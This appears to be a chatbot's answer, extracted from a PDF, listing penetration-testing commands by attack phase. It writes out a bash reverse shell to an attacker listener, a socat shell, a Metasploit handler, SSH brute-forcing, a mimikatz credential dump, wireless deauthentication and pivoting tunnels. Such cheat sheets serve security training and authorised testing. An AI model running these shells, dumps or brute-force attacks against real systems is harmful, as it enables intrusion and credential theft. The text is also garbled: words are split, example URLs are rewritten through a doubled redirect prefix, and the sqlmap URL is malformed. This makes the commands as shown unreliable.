‭Yes, absolutely! I can bold the commands for better readability.

‭Here's the previous list with all the commands bolded:‬

‭I. Reconnaissance/Information Gathering‬

‭●‬ w ‭ hois‬‭<domain>‬
‭○‬ ‭Usage:‬‭whois example.com‬
‭○‬ ‭Details:‬‭Retrieves domain registration information,‬‭including registrant contact‬
‭details, nameservers, and registration/expiration dates. Useful for identifying‬
‭potential contacts or infrastructure.‬
‭●‬ ‭dig‬‭<domain> [record_type]‬
‭○‬ ‭Usage:‬‭dig example.com A‬‭,‬‭dig example.com MX‬‭,‬‭dig‬‭example.com NS‬
‭○‬ ‭Details:‬‭Performs DNS lookups.‬
‭■‬ ‭A: Retrieves IPv4 addresses.‬
‭■‬ ‭MX: Retrieves mail exchange records (email servers).‬
‭■‬ ‭NS: Retrieves name server records.‬
‭■‬ ‭Useful for mapping domain infrastructure and identifying mail servers.‬
‭●‬ ‭host‬‭<domain>‬
‭○‬ ‭Usage:‬‭host example.com‬
‭○‬ ‭Details:‬‭Simple DNS lookup utility that can resolve‬‭hostnames to IP addresses and‬
‭vice-versa.‬
‭●‬ ‭dnsenum‬‭<domain>‬
‭○‬ ‭Usage:‬‭dnsenum example.com‬
‭○‬ ‭Details:‬‭A Perl script that automates DNS enumeration,‬‭including zone transfers,‬
‭reverse lookups, and brute-forcing subdomains.‬
‭●‬ ‭fierce‬‭-dns <domain>‬
‭○‬ ‭Usage:‬‭fierce -dns example.com‬
‭○‬ ‭Details:‬‭Another DNS reconnaissance tool, often used‬‭for finding non-contiguous IP‬
‭space and hostnames.‬
‭●‬ ‭theHarvester‬‭-d <domain> -b all‬
‭○‬ ‭Usage:‬‭theHarvester -d example.com -b all‬
‭○‬ ‭Details:‬‭Gathers emails, subdomains, hosts, employee‬‭names, open ports, and‬
‭banners from public sources (search engines, PGP servers, Shodan).‬
‭●‬ ‭maltego‬‭(GUI tool)‬
‭○‬ ‭Details:‬‭A powerful graphical link analysis tool used‬‭for open-source intelligence‬
‭(OSINT) and forensics. It can map relationships between people, domains, IPs, and‬
‭more.‬
‭●‬ ‭whatweb‬‭<URL>‬
‭○‬ ‭Usage:‬‭whatweb http://example.com‬
‭○‬ ‭Details:‬‭Identifies web technologies used on a website,‬‭including CMS, web server,‬
‭programming languages, and framework.‬
‭●‬ ‭nikto‬‭-h <URL>‬
‭○‬ ‭Usage:‬‭nikto -h http://example.com‬
 ‭○‬ D
‭ etails:‬‭A web server scanner that checks for known vulnerabilities,‬
‭misconfigurations, outdated software, and common files/directories.‬

‭II. Scanning and Enumeration‬

‭●‬ n ‭ map‬‭(Network Mapper)‬
‭○‬ ‭Basic Scan:‬‭nmap <target_IP>‬‭or‬‭nmap <target_domain>‬‭(Scans common ports)‬
‭○‬ ‭Service Version Detection:‬‭nmap -sV <target_IP>‬‭(Detects‬‭service versions‬
‭running on open ports)‬
‭○‬ ‭OS Detection:‬‭nmap -O <target_IP>‬‭(Attempts to determine‬‭the operating system)‬
‭○‬ ‭Aggressive Scan:‬‭nmap -A <target_IP>‬‭(Combines OS‬‭detection, version detection,‬
‭script scanning, and traceroute)‬
‭○‬ ‭Port Range Scan:‬‭nmap -p 1-65535 <target_IP>‬‭(Scans‬‭all 65535 TCP ports)‬
‭○‬ ‭SYN Stealth Scan:‬‭nmap -sS <target_IP>‬‭(Performs a‬‭"stealthy" TCP SYN scan,‬
‭often bypassing basic firewalls)‬
‭○‬ ‭UDP Scan:‬‭nmap -sU <target_IP>‬‭(Scans for open UDP‬‭ports)‬
‭○‬ ‭Script Scanning (NSE - Nmap Scripting Engine):‬‭nmap‬‭--script <script_name>‬
‭<target_IP>‬‭(Runs specific Nmap scripts for vulnerability‬‭detection, enumeration,‬
‭etc.)‬
‭■‬ ‭Example Vulnerability Scan:‬‭nmap --script vuln <target_IP>‬
‭■‬ ‭Example SMB Enumeration:‬‭nmap --script smb-enum-shares‬‭-p 445‬
‭<target_IP>‬
‭●‬ ‭netstat‬‭-tuln‬
‭○‬ ‭Usage:‬‭netstat -tuln‬
‭○‬ ‭Details:‬‭Displays active network connections and listening‬‭ports on the local system‬
‭(Linux/Unix).‬
‭■‬ ‭-t: TCP connections‬
‭■‬ ‭-u: UDP connections‬
‭■‬ ‭-l: Listening ports‬
‭■‬ ‭-n: Numeric addresses (prevents DNS lookups)‬
‭●‬ ‭ss‬‭-tuln‬
‭○‬ ‭Usage:‬‭ss -tuln‬
‭○‬ ‭Details:‬‭A newer and often faster alternative to‬‭netstat‬‭for displaying socket‬
‭statistics.‬
‭●‬ ‭enum4linux‬‭<target_IP>‬
‭○‬ ‭Usage:‬‭enum4linux -a 192.168.1.100‬
‭○‬ ‭Details:‬‭Enumerates information from Windows and Samba‬‭hosts, including users,‬
‭groups, shares, and password policies.‬
‭●‬ ‭snmpwalk‬‭-v2c -c public <target_IP>‬
‭○‬ ‭Usage:‬‭snmpwalk -v2c -c public 192.168.1.100‬
‭○‬ ‭Details:‬‭Queries SNMP-enabled devices for system information,‬‭network interfaces,‬
‭and other data (if public community string is enabled).‬
‭●‬ ‭masscan‬‭<IP_range> -p<ports>‬
‭○‬ ‭Usage:‬‭masscan 192.168.1.0/24 -p80,443,22‬
 ‭○‬ D
‭ etails:‬‭A very fast network scanner capable of scanning large IP ranges quickly for‬
‭specified ports.‬

‭III. Vulnerability Analysis‬

‭●‬ s ‭ earchsploit‬‭<software_name>‬
‭○‬ ‭Usage:‬‭searchsploit apache‬
‭○‬ ‭Details:‬‭Searches the local Exploit-DB repository‬‭for exploits related to a specific‬
‭software or version.‬
‭●‬ ‭nessus‬‭/‬‭openvas‬‭(GUI/Web-based tools)‬
‭○‬ ‭Details:‬‭Commercial (‬‭Nessus‬‭) and open-source (‬‭OpenVAS‬‭)‬‭vulnerability scanners‬
‭that perform comprehensive scans for known vulnerabilities and misconfigurations.‬
‭They provide detailed reports.‬
‭●‬ ‭nikto‬‭(as mentioned above)‬
‭●‬ ‭sqlmap‬‭-u <URL> --batch --crawl=1‬
‭○‬ ‭Usage:‬‭sqlmap -u "http://example.com/id=1" --batch‬‭--crawl=1‬
‭○‬ ‭Details:‬‭Automates the detection and exploitation‬‭of SQL injection flaws and‬
‭database takeover. --batch runs in non-interactive mode, --crawl can discover URLs.‬
‭●‬ ‭burpsuite‬‭(GUI tool, Community/Pro)‬
‭○‬ ‭Details:‬‭A powerful integrated platform for web application‬‭security testing. Includes‬
‭a proxy, scanner, intruder, repeater, and more. Used for intercepting, modifying, and‬
‭analyzing HTTP traffic, and for finding various web vulnerabilities like XSS, SQLi,‬
‭CSRF.‬

‭IV. Exploitation‬
‭●‬ m ‭ sfconsole‬‭(Metasploit Framework)‬
‭○‬ ‭Usage:‬‭msfconsole‬‭(Launches the Metasploit console)‬
‭○‬ ‭Details:‬‭A widely used penetration testing framework‬‭that provides a vast collection‬
‭of exploits, payloads, and post-exploitation modules.‬
‭■‬ ‭search <exploit_name>‬
‭■‬ ‭use exploit/multi/handler‬
‭■‬ ‭set PAYLOAD <payload_type>‬
‭■‬ ‭set LHOST <your_IP>‬
‭■‬ ‭set RHOSTS <target_IP>‬
‭■‬ ‭exploit‬
‭●‬ ‭netcat‬‭(‭n ‬ c‬‭) /‬‭ncat‬
‭○‬ ‭Listening for a shell (listener):‬‭nc -lvp 4444‬
‭○‬ ‭Reverse shell (from target):‬‭bash -i >& /dev/tcp/<your_IP>/4444‬‭0>&1‬
‭○‬ ‭File transfer:‬
‭■‬ ‭Sender:‬‭nc <receiver_IP> <port> < file.txt‬
‭■‬ ‭Receiver:‬‭nc -lvp <port> > received_file.txt‬
‭●‬ ‭socat‬
‭○‬ ‭Usage:‬‭socat tcp-listen:4444,reuseaddr exec:/bin/bash‬
 ‭○‬ D ‭ etails:‬‭A powerful relay for various types of data streams, often used for creating‬
‭stable reverse shells, port forwarding, and pivoting.‬
‭●‬ ‭hydra‬
‭○‬ ‭Usage:‬‭hydra -l admin -P passwords.txt ssh://192.168.1.1‬
‭○‬ ‭Details:‬‭A fast and flexible brute-force tool that‬‭supports numerous protocols (SSH,‬
‭FTP, HTTP, SMB, etc.).‬
‭●‬ ‭john‬‭(John the Ripper)‬
‭○‬ ‭Usage:‬‭john --wordlist=rockyou.txt hashes.txt‬
‭○‬ ‭Details:‬‭A powerful password cracking tool that supports‬‭various hash types and‬
‭cracking modes (dictionary, brute-force, jumbo).‬
‭●‬ ‭hashcat‬
‭○‬ ‭Usage:‬‭hashcat -m 0 -a 0 hashes.txt passwords.txt‬
‭○‬ ‭Details:‬‭A highly optimized and feature-rich password‬‭cracker that supports GPU‬
‭acceleration and a wide array of hash types and attack modes.‬
‭●‬ ‭aircrack-ng‬‭suite (for wireless attacks)‬
‭○‬ ‭airmon-ng start wlan0‬
‭○‬ ‭airodump-ng wlan0mon‬
‭○‬ ‭aireplay-ng -0 10 -a <BSSID> wlan0mon‬
‭○‬ ‭aircrack-ng -w wordlist.txt capture.cap‬

‭V. Post-Exploitation‬
‭●‬ B ‭ asic Linux/Windows Commands (depending on the target OS):‬
‭○‬ ‭Linux:‬‭pwd‬‭,‬‭ls‬‭,‬‭cd‬‭,‬‭cat‬‭,‬‭grep‬‭,‬‭find‬‭,‬‭whoami‬‭,‬‭id‬‭,‬‭uname‬‭-a‬‭,‬‭ps aux‬‭,‬‭history‬‭,‬‭sudo -l‬‭,‬
‭ip a‬‭,‬‭netstat -tuln‬
‭○‬ ‭Windows:‬‭whoami‬‭,‬‭ipconfig‬‭,‬‭netstat -ano‬‭,‬‭tasklist‬‭,‬‭dir‬‭,‬‭cd‬‭,‬‭type‬‭,‬‭systeminfo‬‭,‬‭net‬
‭user‬‭,‬‭net localgroup‬
‭●‬ ‭mimikatz‬‭(Windows)‬
‭○‬ ‭Usage:‬‭./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"‬
‭○‬ ‭Details:‬‭Extracts plaintext passwords, hash values,‬‭PIN codes, and Kerberos tickets‬
‭from memory.‬
‭●‬ ‭powershell-empire‬‭(Windows)‬
‭○‬ ‭Details:‬‭A post-exploitation framework specifically‬‭designed for Windows‬
‭environments, enabling various actions like privilege escalation, credential dumping,‬
‭and persistence.‬
‭●‬ ‭chisel‬
‭○‬ ‭Usage:‬‭./chisel server -p 8000 --reverse‬
‭○‬ ‭Usage:‬‭./chisel client <attacker_IP>:8000 R:22:<target_internal_IP>:22‬
‭○‬ ‭Details:‬‭A fast TCP/UDP tunnel that can be used for‬‭pivoting into internal networks.‬
‭●‬ ‭proxychains‬
‭○‬ ‭Usage:‬‭proxychains nmap -sT -Pn example.com‬
‭○‬ ‭Details:‬‭Forces any TCP connection made by a program‬‭to go through a proxy (e.g.,‬
‭SOCKS5, HTTP, Tor). Useful for anonymizing traffic or reaching internal networks‬
‭through a pivot.‬
‭●‬ R
‭ everse Shell One-Liners:‬‭Various one-liners in Bash, Python, Perl, PHP, Ruby, Netcat‬
‭(without -e), etc., are used to establish a reverse shell connection back to the attacker's‬
‭listener.‬